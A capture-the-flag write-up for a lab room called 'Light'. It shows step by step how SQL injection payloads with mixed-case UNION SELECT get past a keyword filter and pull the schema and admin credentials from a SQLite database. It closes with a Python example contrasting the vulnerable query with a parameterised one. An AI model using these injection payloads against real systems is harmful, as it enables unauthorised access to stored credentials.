Light

Welcome to the Light database application! - by hadrian3689


Last updated 4 months ago


The following post by 0xb0b is licensed under CC BY 4.0.


For this challenge, we will skip the Nmap scan. The room description already asks us to connect to port 1337. We also get a user to start with. The service on 1337 could be the aforementioned database application called Light.

Since this is a database challenge, we try the simplest SQL Injection payload, a single ', and get an error back. The service might be vulnerable to SQL Injection. The error message reports an unrecognized token in ''' LIMIT 30", so our ' probably broke the enclosed string and caused this error.

Now, let's try to get more information using a UNION SELECT injection. But it errors on the comment sequence we used.

' UNION SELECT 1 -- -

Alternatively, we use # as the comment and no longer get the previous error. But some words get blocked, most likely UNION and SELECT.

' UNION SELECT 1 #

We mix upper and lower case characters in UNION, but still get an error. The SELECT keyword is probably filtered too.

' UniOn SELECT 1 #

After applying the same technique to the SELECT keyword, we now get a different error: the token # is not recognized.

' UniOn SeLeCt 1 #

URL encoding the # character does not help either, but we now receive a different error, this time about the ' character.

' UniOn SeLeCt 1 %23

So the backend may run a statement like this, which inserting a ' breaks:

SELECT * FROM users WHERE username = '{user_input}' LIMIT 30;

Leading to:

SELECT * FROM users WHERE username = ''' LIMIT 30;

We close the string with another ' and now have a successful UNION-based injection.

' UniOn SeLeCt 1 '

Next, we query for the version to determine which DBMS is used, so we can craft the payloads to retrieve the data from the database. It is a SQLite database, version 3.31.1.

' UniOn SeLeCt @@version '
' UniOn SeLeCt version() '
' UniOn SeLeCt sqlite_version() '

Next, we query sqlite_master to get the database structure. There is an admintable and a usertable.

' UniOn SeLeCt group_concat(sql) FROM sqlite_master '

We query username and password from the usertable, but do not find the requested information:

' UniOn SeLeCt group_concat(username) FROM usertable '
' UniOn SeLeCt group_concat(password) FROM usertable '

Next, we query username and password from the admintable and find the username, the password and the requested flag.

' UniOn SeLeCt group_concat(username) FROM admintable '
' UniOn SeLeCt group_concat(password) FROM admintable '
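To show why the keyword filter observed above is not a fix, and what is, here is an added example (not code from the room or from this writeup) that rebuilds the inferred query against a constructed in-memory SQLite database. The table rows, the single selected column and the "--" entry in the filter are assumptions.

```python
import sqlite3

# Constructed in-memory database mirroring the schema the writeup recovers from
# sqlite_master (a usertable and an admintable). Rows are placeholders, not room data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO usertable (username, password) VALUES ('alice', 'user-placeholder');
        INSERT INTO admintable (username, password) VALUES ('admin', 'admin-placeholder');
    """)
    return db

# Case-sensitive keyword denylist like the one the writeup runs into;
# including "--" is an assumption based on the comment sequence being rejected.
BLOCKED = ("UNION", "SELECT", "--")

def denylist_ok(user_input):
    return not any(word in user_input for word in BLOCKED)

def lookup_vulnerable(db, user_input):
    """Input is concatenated into the SQL text, as the writeup infers.
    Returns None when the denylist rejects the input, else the result rows."""
    if not denylist_ok(user_input):
        return None
    # One selected column is assumed so the writeup's one-column UNION lines up.
    sql = f"SELECT password FROM usertable WHERE username = '{user_input}' LIMIT 30"
    return db.execute(sql).fetchall()

def lookup_safe(db, user_input):
    """Parameterised query: the driver binds the input as a value, so quotes,
    keywords and case tricks are just characters of a username."""
    sql = "SELECT password FROM usertable WHERE username = ? LIMIT 30"
    return db.execute(sql, (user_input,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    mixed_case = "' UniOn SeLeCt group_concat(password) FROM admintable '"
    print(lookup_vulnerable(db, "' UNION SELECT 1 '"))  # None: caught by the denylist
    print(lookup_vulnerable(db, mixed_case))            # leaks admintable
    print(lookup_safe(db, mixed_case))                  # []: treated as a username
```

The denylist only catches the exact upper-case spelling, while the parameterised query returns nothing for the same payload because it never reaches the SQL parser as code.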